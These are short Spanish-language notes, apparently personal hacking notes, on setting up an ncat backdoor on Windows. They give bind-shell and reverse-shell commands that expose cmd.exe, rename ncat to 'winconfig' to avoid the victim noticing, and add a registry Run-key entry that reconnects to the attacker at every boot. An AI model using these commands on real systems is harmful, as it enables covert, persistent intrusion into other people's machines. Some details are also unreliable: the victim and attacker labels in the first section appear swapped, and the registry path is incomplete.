Ncat

Backdoor usando la herramienta ncat

Victima a atacante

Esta comanda se ejecuta en la máquina victima, y la ponemos en modo listening por el puerto 5555 y ejecutamos una terminal. Sale winconfig por qué hemos cambiado el binario para que la victima no sospeche que tenemos la apliación ncat

Comando victima

ncat <IP victima> 5555 # tenemos acceso a la máquina

Comando atacante

winconfig -l -p 5555 -e cmd.exe

Atacante a victima

Comando atacante

En nuestra máquina atacante ejecutamos el comando que escuchará:

ncat -l -p 5555 -v

Comando victima

winconfig -e cmd.exe <nuestra IP> 5555

Backdoor Persistence

Poner en: Regedit -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Run Creamos un nuevo archivo -> Winconfig

"<Donde\este\ncat\ncat.exe <nuestra IP> <puerto> -e cmd.exe"

Esto hará que cada vez que se inicie el ordenador se ejecute el backdoor.